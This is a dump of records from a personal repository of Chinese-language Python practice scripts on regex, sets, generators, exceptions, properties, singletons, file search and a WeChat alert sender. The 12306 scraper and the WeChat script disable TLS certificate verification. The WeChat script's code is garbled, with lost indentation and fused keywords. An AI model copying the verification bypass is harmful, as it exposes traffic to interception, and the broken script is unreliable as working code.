(?P<组名>正则)\nret = re.search('(?P<id>\\d{3})/(?P<name>\\w{3})', 'wer34ttt098/ooo')\nprint(ret.group())\nprint(ret.group('id'))\nprint(ret.group('name'))\n\nprint('match 只在字符串开始匹配,返回开头的第一个匹配到的对象')\nprint(re.match('asd', 'adfgasd'))\nprint(re.match('asd', 'asdfgasd').group())\n\n# 中括号中所有字符都是或者关系\nprint('字符分割 split, 第一个参数是分割关键字,第二个为被分割的字符串')\nprint(re.split('[@:]', '3@15:09:35'))\nprint(re.split('[\\.3@]', '3@15:09:35.789'))\nprint(re.split('[ks]', 'lsk,-salk'))\nprint(re.split('[k,s]', 'lsk,-salk'))\n\n\n# sub 替换 第一参数是 正则匹配,第二个是要替换的字符串,第三个是被替换的字符串\nprint('sub 匹配替换,类似sed')\nprint(re.sub('a..x', 'sxxxb', 'hfjasalexxdhf'))\n\n# 编译\nprint('compile 编译匹配')\nprint(re.compile('\\.com'))\nobj = re.compile('\\.com')\nprint(obj.findall('sdjfsldfj.comwoehrow'))\nprint(obj.split('sdfg.comwertyu'))\nprint(obj.sub('.cn', 'www.baidu.com'))\n\ntest = re.compile('\\([^()]+\\)')\nprint(test.findall('1 - 2 * ((60-30 + (-40/5) * (9-2*5/3+7/3*99/4*2998+10*568/14))-(-4*3)/(16-3*2))'))" }, { "alpha_fraction": 0.5336374044418335, "alphanum_fraction": 0.5598631501197815, "avg_line_length": 18.488889694213867, "blob_id": "e2326a56fde2d18b47c062c3bc711c7538b63ff9", "content_id": "d4138051f5b31253b5d64c6b04cfd5b62cf92bf7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1051, "license_type": "no_license", "max_line_length": 56, "num_lines": 45, "path": "/python学习/函数/集合set.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/7/8 21:32\n\n\n\n\n# print(set('alex') == set('alexexex'))\n# print(set(\"alex\") < set('alexw'))\n\n\n# print('Set And: ', set('alex') and set('alexw'))\n# print('Set Or', set('alex') or set('alexw'))\n\n\n# a = set([1, 2, 3, 4, 5])\na = set([4, 5])\nb = set([4, 5, 6, 7, 8])\n\nprint('集合a:', a)\nprint('集合b: ', b)\n\nprint('交集', a.intersection(b))\nprint('交集&', a & b)\n\nprint('并集', a.union(b))\nprint('并集|', a | b)\n\nprint('差集a-b', a.difference(b))\nprint('差集a-b', a - b)\n\nprint('差集b-a', b.difference(a))\nprint('差集b-a', b - a)\n\nprint('对称差集', a.symmetric_difference(b)) # 除了相同的,其他的取出来\nprint('对称差集^', a ^ b)\n\nprint('对称差集', b.symmetric_difference(a)) # 除了相同的,其他的取出来\nprint('对称差集^', b ^ a)\n\nprint('子集', a.issubset(b)) # a 是否是 b 的子集\nprint('子集 <', a < b)\nprint('超集/父集', a.issuperset(b)) # a 是否完成包含 b\nprint('超集/父集>', a > b)\n" }, { "alpha_fraction": 0.5011494159698486, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 15.11111068725586, "blob_id": "4575ea64daf5c9a76b4bd09e5ee7f87f106ba976", "content_id": "244278b34f6c8d23d3b8fa80165274d7613829c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 449, "license_type": "no_license", "max_line_length": 59, "num_lines": 27, "path": "/python学习/函数/生成器.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-11-22\n\n__author__ = '@jiawenlong'\n\n\ndef fib(fmax):\n n, before, after = 0, 0, 1\n\n while n < fmax:\n\n # print(before)\n # 生成器 标志 yield\n name = yield before\n\n print(\"My name is %s ! What is your name ?\" % name)\n\n before, after = after, before + after\n\n n = n + 1\n\n\ng = fib(6)\nprint(next(g))\ng.send(\"jiawenlong\")\n" }, { "alpha_fraction": 0.6283783912658691, "alphanum_fraction": 0.633783757686615, "avg_line_length": 27.384614944458008, "blob_id": "21baa58008e10cf53192d0fa976f7086dff6ece3", "content_id": "8ecd596b1ee35d99b58c7e4b59d0e2a97af0e6ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 740, "license_type": "no_license", "max_line_length": 96, "num_lines": 26, "path": "/未定义项目练习/markdown2html.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport glob\nimport os\nimport markdown\n\n\nSOURCE_FILES_PATH = os.path.join(\"/Users/admin/Documents/work/shells/\", \"test.md\")\nSOURCE_FILES = glob.glob(SOURCE_FILES_PATH)\n\nfor pos in range(0, len(SOURCE_FILES)):\n file_base_name = os.path.basename(SOURCE_FILES[pos])\n file_name = file_base_name.replace(\".md\", \"\")\n output_files_path = os.path.join(\"/Users/admin/Documents/work/shells/\", file_name + \".html\")\n\n markdown.markdownFromFile(\n input=SOURCE_FILES[pos],\n output=output_files_path,\n encoding=\"utf-8\",\n extensions=[\n 'markdown.extensions.fenced_code',\n 'markdown.extensions.tables'\n ],\n output_format=\"html5\"\n )\n\n\n" }, { "alpha_fraction": 0.5306427478790283, "alphanum_fraction": 0.5440956354141235, "avg_line_length": 15.518518447875977, "blob_id": "d8e80ea5f356a10cc4bf56500c07caa810f14417", "content_id": "ad74a216af61b441f65f3f2a03f6e7627327e7f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1618, "license_type": "no_license", "max_line_length": 41, "num_lines": 81, "path": "/python学习/面向对象学习/异常处理.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-30\n\n__author__ = '@jiawenlong'\n\"\"\"\ntry:\n # 代码块\n # i = int('1')\n i = input('请输入序号:')\n int(i)\nexcept IndexError as e:\n print(\"\\nIndexError\", e, '\\n')\nexcept ValueError as e:\n print(\"\\nValueError\", e, '\\n')\nexcept Exception as e:\n # 上述代码如果出错,自动执行当前块\n # e 是 Exception的对象,对象中封装错误信息\n print(\"\\nException\", e)\nelse:\n # try 中没有报错执行try,如果有错就执行此处\n print(\"\\nelse\", i, '\\n')\nfinally:\n # 不论上面是否报错,此处都执行\n print('finally', i)\n\n# try:\n# raise Exception('主动触发异常')\n# except Exception as e:\n# print(e)\n\"\"\"\n\n'''\ndef db():\n return False\n\n\ndef index():\n try:\n r = input('>>')\n int(r)\n \n \n resault = db()\n if not resault:\n r = open('log', 'a')\n r.write('连接失败')\n # raise Exception('连接失败')\n except Exception as e:\n str_error = str(e)\n print(str_error)\n\nindex()\n'''\n\n'''\n# 自定义错误\n\nclass OldBoyError(Exception):\n def __init__(self, msg):\n self.message = msg\n\n def __str__(self):\n return self.message\n\n\n# obj = OldBoyError('xxx')\n# print(obj)\n\ntry:\n raise OldBoyError('我错了。。。。')\nexcept OldBoyError as e:\n print(e)\n'''\n\n# assert 条件 断言 用户用户服从,不服从就报错,并且可捕获,一般不捕获\n# 条件必须满足,不满足就报错\nprint(123)\nassert 1 == 2\nprint(567)\n" }, { "alpha_fraction": 0.5009862184524536, "alphanum_fraction": 0.523668646812439, "avg_line_length": 15.095237731933594, "blob_id": "2b16469fa0140bfe1a69033636e65721a47c0a4b", "content_id": "ee976d9dbb3cb491c848cedebe98ad80ae7078ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 55, "num_lines": 63, "path": "/python学习/面向对象学习/class_属性.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-22\n\n__author__ = '@jiawenlong'\n\n\n# 属性的写法之一\n# class province:\n# def __init__(self):\n# self.L = ['jiawenlong']\n# # 属性\n# @property # 用于执行 obj.per\n# def per(self):\n# return self.L\n#\n# @per.setter\n# def per(self, val):\n# self.L.append(val)\n# print(self.L)\n#\n# @per.deleter\n# def per(self):\n# del self.L[1]\n# print(self.L)\n#\n# # 属性调用\n# obj = province('aaa')\n# # obj.per # print(\"Per\")\n# ret = obj.per\n# print(ret)\n# obj.per = 111\n#\n# del obj.per\n\n\n# 属性的写法之二\nclass province1:\n # 属性\n def __init__(self):\n self.L = ['jiawenlong']\n\n def per(self):\n return self.L\n\n def set_per(self, val):\n self.L.append(val)\n print(self.L)\n\n def del_per(self):\n del self.L[1]\n print(self.L)\n\n p1 = property(fget=per, fset=set_per, fdel=del_per)\n\n\nobj = province1()\n\nret = obj.p1\nprint(ret)\nobj.p1 = 111\ndel obj.p1\n" }, { "alpha_fraction": 0.6891891956329346, "alphanum_fraction": 0.7702702879905701, "avg_line_length": 15.333333015441895, "blob_id": "50e9da0c16df6bc8b384f46117cadb1d5aa12fc2", "content_id": "0d2c5ca74ee493d5f01067cc05c9806b37aeac87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 148, "license_type": "no_license", "max_line_length": 24, "num_lines": 9, "path": "/python学习/模块/example.ini", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "[DEFAULT]\nserveraliveinterval = 45\ncompression = yes\ncompressionlevel = 9\nforwardx11 = yes\n\n[www.myconfigParser.com]\nport = 10086\nforwardx11 = yes\n\n" }, { "alpha_fraction": 0.5355424880981445, "alphanum_fraction": 0.5611972212791443, "avg_line_length": 27.78461456298828, "blob_id": "bb4c6ff556911740465deb126d8485810cce0643", "content_id": "81ad60f2ef6d708a5745135b7a749b532ad06273", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2521, "license_type": "no_license", "max_line_length": 101, "num_lines": 65, "path": "/12306/fuck12306_get_city.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2017-11-24\n\n__author__ = '@jiawenlong'\n\nimport urllib2\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context # 忽略证书认证\n\n# 城市\ncity_uri = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js?station_version=1.9027'\n\n\ndef get_city_list(): # 本函数 是生成器\n cities = urllib2.urlopen(city_uri).read() # 访问城市的url获取城市的信息,是str\n cities = cities.split('=')[1] # 分割字符串得到想要的城市信息和对应的代码,生成list,list的第二个元素就是城市信息和对应的代码\n cities = cities.split('|') # 对第二个信息再次分割,生成list,就是城市相关信息\n\n for i in range(len(cities)/5): # 城市信息 5 个元素是一个城市,总共有 len(cities)/5 个城市\n city_name = cities[i * 5 + 1]\n city_code = cities[i * 5 + 2]\n yield city_name # 每组取出 i*5+1 和 i*5+2 这 2 个元素 就是城市对名称和对应对字母代码\n yield city_code\n\n\ndef get_city_code(city):\n cities_code = get_city_list() # 创建生成器 并肤质给 cities_code\n for i in cities_code: # 对生成器进行循环 取出第一次的值 城市名称 如: 北京\n code = next(cities_code)\n if i == city: # 和函数传入的城市对比 如果相同 输出城市名称和代码\n # print city, code\n return code\n\n# print get_city_code(\"天津\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n# def get_city_dic(): # 本函数 最终返回字典\n# cities = urllib2.urlopen(city_uri).read() # 访问城市的url获取城市的信息,是str\n# cities = cities.split('=')[1] # 分割字符串得到想要的城市信息和对应的代码,生成list,list的第二个元素就是城市信息和对应的代码\n# cities = cities.split('|') # 对第二个信息再次分割,生成list,就是城市相关信息\n#\n# for i in range(len(cities)/5): # 城市信息 5 个元素是一个城市,总共有 len(cities)/5 个城市\n# city_name = cities[i*5+1]\n# city_code = cities[i*5+2]\n# yield city_name, city_code # 每组取出 i*5+1 和 i*5+2 这 2 个元素 就是城市对名称和对应对字母代码\n" }, { "alpha_fraction": 0.46833929419517517, "alphanum_fraction": 0.49940264225006104, "avg_line_length": 15.411765098571777, "blob_id": "a1446aa44f24a9befc6acb7556335623fb2f3751", "content_id": "fa448a09f9874310ee5f55eda8ca3417ec50d564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 917, "license_type": "no_license", "max_line_length": 35, "num_lines": 51, "path": "/python学习/面向对象学习/单例模式.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-04-02\n\n__author__ = '@jiawenlong'\n\n\"\"\"\nclass Foo:\n \n \n def __init__(self, name, age):\n self.name = name\n self.age = age\n \n def show(self):\n print(self.name,self.age)\n\n# obj = Foo('ali', 19) # obj 也叫实例\n# obj1 = Foo('ali', 19) # obj 也叫实例\n# obj2 = Foo('ali', 19) # obj 也叫实例\n# obj3 = Foo('ali', 19) # obj 也叫实例\n\n# 单例,目的:永远使用同一份对象(实例)\nv = None\nwhile True:\n if v:\n v.show()\n else:\n v = Foo('Justin', 13)\n v.show()\n\"\"\"\n\n\nclass Foo:\n __v = None\n\n @classmethod\n def get_instance(cls):\n if cls.__v:\n return cls.__v\n else:\n cls.__v = Foo()\n return cls.__v\n\n\n# 不要使用 类()\nobj1 = Foo.get_instance()\nprint(obj1)\nobj2 = Foo.get_instance()\nprint(obj2)\n" }, { "alpha_fraction": 0.47592848539352417, "alphanum_fraction": 0.5116918683052063, "avg_line_length": 18.105262756347656, "blob_id": "2e3525d49b613263965504d5ebba2c9de31c9c23", "content_id": "8ab7a780ed9c124ca2f790dc90b368079532b966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 773, "license_type": "no_license", "max_line_length": 43, "num_lines": 38, "path": "/python学习/面向对象学习/class_属性练习.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2018-03-22\n\n__author__ = '@jiawenlong'\n\n\"\"\"class 属性练习,实现分页效果\"\"\"\n\nclass create_page:\n def __init__(self, page):\n try:\n p = int(page)\n if p >= 11 or p <= 0:\n p = 1\n except Exception as e:\n p = 1\n\n self.page = p\n\n @property\n def start(self):\n current_page = (self.page - 1) * 10\n return current_page\n\n @property\n def end(self):\n current_page = self.page * 10\n return current_page\n\nli = []\nfor i in range(1, 101):\n li.append(i)\n\nwhile True:\n p = input(\"请输入想要查看的页码(1-10)->: \")\n page = create_page(p)\n print(li[page.start:page.end])\n\n" }, { "alpha_fraction": 0.5954368114471436, "alphanum_fraction": 0.6427379250526428, "avg_line_length": 22.0256404876709, "blob_id": "f135ac03ef03681cb02a7de95bdbfe19f39ab28a", "content_id": "0b81de4b5478576e20a69c4381dd6e3d85a6d01c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2001, "license_type": "no_license", "max_line_length": 69, "num_lines": 78, "path": "/未定义项目练习/helloword.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport time\nimport datetime\nimport random\nfrom dateutil import parser\n\nprint \"列表合并\"\nl1 = ['a', 'b']\nl2 = [1, 2]\nprint(\"L1:%s\" %l1 , \"L2:%s\" %l2)\nprint dict([l1, l2])\nprint dict(zip(l1, l2))\n\n\nprint('')\nprint(\"随机数:\")\ntime.sleep(1)\nprint(random.uniform(1, 10))\nprint(random.randint(1, 10))\nprint(random.random())\n\nprint('')\nprint(\"时间模块\")\nprint('时间模块 天/月/年:%s' % (datetime.date.today()).strftime('%d/%m/%Y'))\nprint('时间模块 年-月-日:%s' % (datetime.date.today()).strftime('%Y-%m-%d'))\nmyDT = datetime.date(2017, 8, 2)\nprint(myDT.strftime('%Y-%m-%d'))\nprint time.ctime(time.time())\nprint time.asctime(time.localtime(time.time()))\ndt1 = time.asctime(time.gmtime(time.time()))\ndt = parser.parse(dt1)\nprint dt\n\nprint('')\nprint('字符串长度')\ns = 'strlen'\nprint \"strlen:\", len(s)\nprint(\"strlen:\", len(s))\n#st = raw_input('pleaer input a string:')\nst=\"1234\"\nprint \"st:\", len(st)\nprint \"the string st has %d characters\" % len(st)\n\n\n\n\ntimbitsLeft = int(input(\"输入购买个数:\")) # 步骤1: 得到输入\ntotalCost = 0 # 步骤2: 设定总计\n\n# 步骤3: 尽可能地多买大盒子\nif timbitsLeft >= 40:\n bigBoxes = int(timbitsLeft / 40)\n totalCost = totalCost + bigBoxes * 6.19 # 更新总计\n timbitsLeft = timbitsLeft - 40 * bigBoxes # 仍需计算timbits\nif timbitsLeft >= 20:\n bigBoxes = int(timbitsLeft / 20) # 步骤4, 我们能购买一个中盒子么?\n totalCost = totalCost + 3.39\n timbitsLeft = timbitsLeft - 20\nif timbitsLeft >= 10:\n bigBoxes = int(timbitsLeft / 10)# 步骤5, 我们能购买一个小盒子么?\n totalCost = totalCost + 1.99\n timbitsLeft = timbitsLeft - 10\nif timbitsLeft >= 1:\n totalCost = totalCost + 0.20\n timbitsLeft = timbitsLeft - 1\n\ntotalCost = totalCost + timbitsLeft * 0.2 # 步骤6\nprint(\"总计需要:%s\" % totalCost)\n\n\ndef middle(L):\n Longth=len(L)\n mid=int(Longth//2)\n print(L[mid])\n\nmiddle([1,2,3,4,51,4,10,30])\n\n" }, { "alpha_fraction": 0.45393258333206177, "alphanum_fraction": 0.4988763928413391, "avg_line_length": 15.481481552124023, "blob_id": "4e8bfc758bf16fccb5404dc5715ddd7d676a3d9b", "content_id": "de9ad0c8c4bc04368898e389167d0e0a527eb894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1074, "license_type": "no_license", "max_line_length": 107, "num_lines": 54, "path": "/python学习/从新手到大师/循环结构.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author : @jiawenlong\n# Date :2019/7/15 21:57\n\n\n# \"\"\"\n# 判断是否是素数\n# \"\"\"\n#\n# from math import sqrt\n#\n# num = int(input('请输入一个正整数:'))\n# end = int(sqrt(num))\n# is_prime = True\n# for x in range(2, end + 1):\n# if num % x == 0:\n# is_prime = False\n# break\n#\n# if is_prime and num != 1:\n# print('%d 是素数' % num)\n# else:\n# print('%d 不是素数' % num)\n\n# print(int(sqrt(num)))\n\n\n\"\"\"\n 练习1\n 百钱百鸡\n 公鸡5元,母鸡3元,小鸡三只1元,一百元一百只鸡\n 公鸡、母鸡、小鸡各多少\n\"\"\"\n\nfor x in range(0, 20):\n for y in range(0, 33):\n z = 100 - x - y\n if 5 * x + 3 * y + z / 3 == 100:\n print('公鸡 %d 只 , 母鸡 %d 只, 小鸡 %d 只' % (x, y, z))\n\n\n# a = 10\n#\n#\n# def one():\n# # global a\n# print(a) # UnboundLocalError: local variable 'a' referenced before assignment 未分配的本地错误:局部变量a在赋值前引用了\n# a = 100\n# print(a)\n#\n#\n# one()\n# print(a)\n" }, { "alpha_fraction": 0.4962002635002136, "alphanum_fraction": 0.4975413382053375, "avg_line_length": 23.85555648803711, "blob_id": "38a347388327c90b607c576f46d9a49aa661b77b", "content_id": "f4262c41793f69761fff9f2db595cfe4e240b852", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2473, "license_type": "no_license", "max_line_length": 75, "num_lines": 90, "path": "/python学习/函数/zhuangshiqi_zuoye.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author : @jiawenlong\n\n\nlogin_status = \"False\"\nusername = \"jiawenlong\"\npassword = \"123456\"\n\nwxusername = \"wx\"\nwxpassword = \"123456\"\n\nimport time\n\n\ndef input_name(auth, name, pwd, page, *x, **y):\n user = input(\"请输入 %s 用户名: \" % auth)\n passwd = input(\"请输入 %s 密码: \" % auth)\n if user == name and passwd == pwd:\n page(*x, **y)\n else:\n print(\"\\n账号密码输入错误,请重新输入\")\n input_name(auth, name, pwd, page, *x, **y)\n\n\ndef max_login(auth=\"jd\"): ## 装饰器参数\n def check_login(page): ### 装饰器函数\n def login(*x, **y):\n global login_status\n if login_status != \"True\":\n if auth == \"jd\":\n input_name(auth, username, password, page, *x, **y)\n login_status = \"True\"\n elif auth == \"wx\":\n input_name(auth, wxusername, wxpassword, page, *x, **y)\n login_status = \"True\"\n else:\n page(*x, **y)\n\n return login\n\n return check_login\n\n\n@max_login(\"wx\")\ndef home(*x, **y):\n print(\"\\nThis is home page....\")\n page_name = \" \"\n for i in x:\n page_name = i + \" \" + page_name\n print(\"I Have All The Class :\")\n print(\"They ware %s ......\\n\" % page_name)\n\n\n@max_login(\"jd\")\ndef jr(*x, **y):\n print(\"\\nThis is jr page\")\n page_name = \" \"\n for i in x:\n page_name = i + \" \" + page_name\n print(\"I Have All The JinRong Class: \")\n print(\"They ware %s .....\\n\" % page_name)\n\n\n@max_login()\ndef phone(*x, **y):\n page_name = \" \"\n print(\"\\nThis is Phone Page......\")\n for i in x:\n page_name = i + \" \" + page_name\n print(\"You Can search All Class of Phone: \")\n print(\"They ware %s ......\\n\" % page_name)\n\n\nprint(\"\\nThis home Page \\n\")\nhtm = \"home\"\nwhile True:\n print(\"\\n当前您在 home 页面,还可以进入的页面是:jr home phone OR exit 退出\")\n htm = input(\"---> \")\n if htm == \"jr\":\n jr(\"基金理财\", \"京东理财\", \"京东E卡\")\n elif htm == \"home\":\n home(\"京东金融\", \"手机\", \"服装\", \"超市\")\n elif htm == \"phone\":\n phone(\"华为\", \"三星\", \"小米\", \"荣耀\", \"iphone\")\n elif htm == \"exit\":\n exit()\n else:\n print(\"\\n您想进入的页面正在建设中,请重新选择!!!,5秒后自动跳转 home 页面!!!!!\")\n time.sleep(5)\n" }, { "alpha_fraction": 0.6436475515365601, "alphanum_fraction": 0.6534836292266846, "avg_line_length": 30.49032211303711, "blob_id": "897c2cbe87216aca8efae23fa952575a96aeebf9", "content_id": "1c0d71774ae56602c653f552b324b444065b421e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5668, "license_type": "no_license", "max_line_length": 122, "num_lines": 155, "path": "/未定义项目练习/wx.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n# author: yangrong\n# date: 2015-8-19\n# 本微信报警脚本应用于企业订阅号\n# 当用户主动发消息给公众号的时候(包括发送信息、点击自定义菜单、订阅事件、扫描二维\n# 码事件、支付成功事件、用户维权),微信将会把消息数据推送给开发者,开发者在一段时\n# 间内(目前修改为48小时)可以调用客服消息接口,通过POST一个JSON数据包来发送\n# 消息给普通用户,在48小时内不限制发送次数。\n\n\n\nimport os\nimport urllib2\nimport requests\nimport sys\nimport time\nimport json\nimport pickle\n\nappid = 'wxc88**************'\nsecret = 'b9b8925aaa0eafc***********'\ntoken_file = '/tmp/token_file.txt'\nlog_file = '/tmp/wechat.log'\nopenid_user_file = '/tmp/openid_user.txt'\nopenid_list = [\"omPAFj8PBaE4UbdOGmgjFfq-shFM\", # 杨容\n \"omPAFj27U-7PJkgYyHMk1wvDI27o\", # 阿飞\n ] # 这是微信接收者的openid\n\n# 报警格式,脚本名 收件人 标题 内容\n# 这是zabbix发送内容格式,所以\n# 这里取出标题和内容就行了\n\n# 帮助信息,要求必须传参4个\nif len(sys.argv) != 4:\n print 'Usage: %s mail-to title content' % sys.argv[0]\n print 'Example: '\n print ' %[email protected] \"this is testtitle\" \"this is test content.\"' % sys.argv[0]\n sys.exit()\n\ntitle = sys.argv[2]\ncontent = sys.argv[3]\ncurrent_hour = time.strftime('%H', time.localtime(time.time()))\n\n\n# 日志记录函数,把标题,用户id,状态记录\ndef log(title, openid, status):\n withopen(log_file, 'ab') as f:\n current_time = time.strftime('%Y-%m-%d%H:%M:%S', time.localtime(time.time()))\n f.write('%s| %s | %s | %s\\n' % (current_time, openid, status, title))\n\n\n# 获取token\nclass Token(object):\n def __init__(self, appid, secret):\n self.baseurl = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={0}&secret={1}'.format(\n appid, secret)\n self.expire_time = sys.maxint\n\n def get_token(self):\n if self.expire_time > time.time():\n request = urllib2.Request(self.baseurl)\n response = urllib2.urlopen(request)\n ret = response.read().strip()\n ret = json.loads(ret)\n if 'errcode' in ret.keys():\n print >> ret['errmsg'], sys.stderr\n sys.exit(1)\n self.expire_time = time.time() + ret['expires_in']\n self.access_token = ret['access_token']\n token_pre = [current_hour, self.access_token]\n with open(token_file, 'wb') as f:\n pickle.dump(token_pre, f)\n\n return self.access_token\n\n\n# access_token = Token(appid=appid,secret=secret).get_token() #这是获取access_token的代码\n# print access_token\n\n\n# 获取所有的openid,然后根据openid获取用户信息,提取出用户名,最后输出用户名与openid的对应关系。\nclass get_user():\n def__init__(self):\n self.access_token = Token(appid, secret).get_token()\n\n\ndefget_openid_list(self):\nopenid_list_url = 'https://api.weixin.qq.com/cgi-bin/user/get?access_token={0}&next_openid='.format(self.access_token)\nrequest = urllib2.Request(openid_list_url)\nresponse = urllib2.urlopen(request)\nret = response.read().strip()\nopenid_list = json.loads(ret)\n# printopenid_list['data']['openid']\nopenid_list = openid_list['data']['openid']\nforopenid in openid_list:\nuser_info_url = 'https://api.weixin.qq.com/cgi-bin/user/info?access_token={0}&openid={1}'.format(self.access_token,\n openid)\nuser_info_request = urllib2.Request(user_info_url)\nuser_info_response = urllib2.urlopen(user_info_request).read().strip()\nuser_info = json.loads(user_info_response)\nif 'errcode' in user_info.keys():\n print>> user_info['errmsg'], sys.stderr\n sys.exit()\nwithopen(openid_user_file, 'wb') as f:\nf.write('openid:%s nickname:%s' % (openid, user_info['nickname']))\n\n\n# 使用post方式发送报警\ndef send_msg(title, content):\n # 一天能够获取的access_token次数是2000次,每次取到的token有效时间2小时,所以pickle dump时,把当前小时数与access_token写入文件,每一小时获取一次token.\n current_hour = time.strftime('%H', time.localtime(time.time()))\n ifnot\n os.path.exists(token_file):\n access_token = Token(appid, secret).get_token()\n\n\nwithopen(token_file, 'rb') as f:\ntoken_pre = pickle.load(f)\n# print'token_pre:',token_pre\naccess_token_pre = token_pre[1]\ncurrent_hour_pre = token_pre[0]\nifcurrent_hour == current_hour_pre:\naccess_token = access_token_pre\nelse:\naccess_token = Token(appid, secret).get_token()\n# print'access_token:',access_token\n# 循环openid_list,给每个成员单独推送微信消息\nforopenid in openid_list:\n# print'openid:',openid\nurl = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=%s' % access_token\npayload = {\n \"touser\": '%s' % openid,\n \"msgtype\": \"text\",\n \"text\": {\n \"content\": \"Title: %s\\nContent:%s\" % (title, content)\n }\n}\nret = requests.post(url, data=json.dumps(payload, ensure_ascii=False), verify=False)\nresult = ret.json()\n\n# printresult\n# 如果这一次发送失败,则代表可能access_token有问题,删除pickle dump文件,重新生成一次access_token\nif result['errcode']:\n log(title, openid, 'sendfail')\n os.remove(token_file)\n access_token = Token(appid, secret).get_token()\nelse:\n log(title, openid, 'sendsuccess')\n\n # printpost(url, data)\n\n# get_user().get_openid_list() #这是遍历所有openid,获取openid和用户名的对应关系。\n\nsend_msg(title, content) # 发送微信信息" }, { "alpha_fraction": 0.4917701780796051, "alphanum_fraction": 0.5178571343421936, "avg_line_length": 23.36742401123047, "blob_id": "51ebc7056cb1b4ad4f35d9f81c132d228a2e554a", "content_id": "67e897830934707bd3dad99e6c3a0c8d04996321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6946, "license_type": "no_license", "max_line_length": 209, "num_lines": 264, "path": "/未定义项目练习/lianxie.py", "repo_name": "dragon434/untitled", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n\n\n### 查找给出的目录中 所有 txt 结尾的文件\n#path = raw_input(\"请输入目录路径——>: \")\n#print(os.getcwd()) ### 当前目录\n#os.chdir(path) ### 转换目录\n#print(os.getcwd())\n\n\n# find 1\n#path = \"/Users/admin/Downloads\"\n#keys = \"txt\"\n#files = os.walk(path) # 遍历所有目录 files 是个地址\n#for file in files: # file 是 给出路径下的所有目录以及目录下的文件,是一个元组 file 是 eg: ('/Users/admin/Downloads/apk/\\xe5\\x95\\x86\\xe6\\x88\\xb7app', [], ['bqboss_2.8.6.apk', 'bqboss_2.8.7.apk', 'bqboss_2.8.8.apk', 'bqboss_2.8.9.apk'])\n# for i in file: # i 是一个列表 根据file来遍历\n# for k in i: # k 是文件名,或者目录名 根据 file i 来遍历\n# if k.endswith(keys): # k 是文件名\n# print file[0] + \"/\" + k # 输出给出的路径和文具吗\n\n#one\n#path = \"/Users/admin/Downloads\"\n#keys = \"txt\"\n#for parent, dirname, filenames in os.walk(path):\n# for filename in filenames:\n# if filename.endswith(keys):\n# print parent + \"/\" + filename\n\n# find 2\n#def findfile(inputdir):\n# txtlist = []\n# for parent, dirnames, filename in os.walk(inputdir):\n# #print parent,dirnames\n# for filenames in filename:\n# txtlist.append(filenames)\n# return fnmatch.filter(txtlist, '*.txt') ## fnmatch.filter()第一个参数必须是列表\n# findfile(path)\n# #print(findfile(path))\n\n## 竖排文字 行转列\n# x = u\"静夜思 李白床前明月光,疑似地上霜。举头望明月,低头思故乡.\"\n# k = 0\n# for i in range(0,6): #行\n# s = \"\"\n# for m in range(0,5): # 列\n# s += x[ i + 6 * m ] + \"|\"\n# k += 1\n# if k%5 == 0: print s ;continue\n\n# import os\n# import fnmatch\n# ### python 实现grep -lr\n# search=\"微信\"\n# path = \"/Users/admin/Downloads/crt\"\n# keys = \"txt\"\n# for parent, dirname, filenames in os.walk(path):\n# for filename in filenames:\n# file = parent + 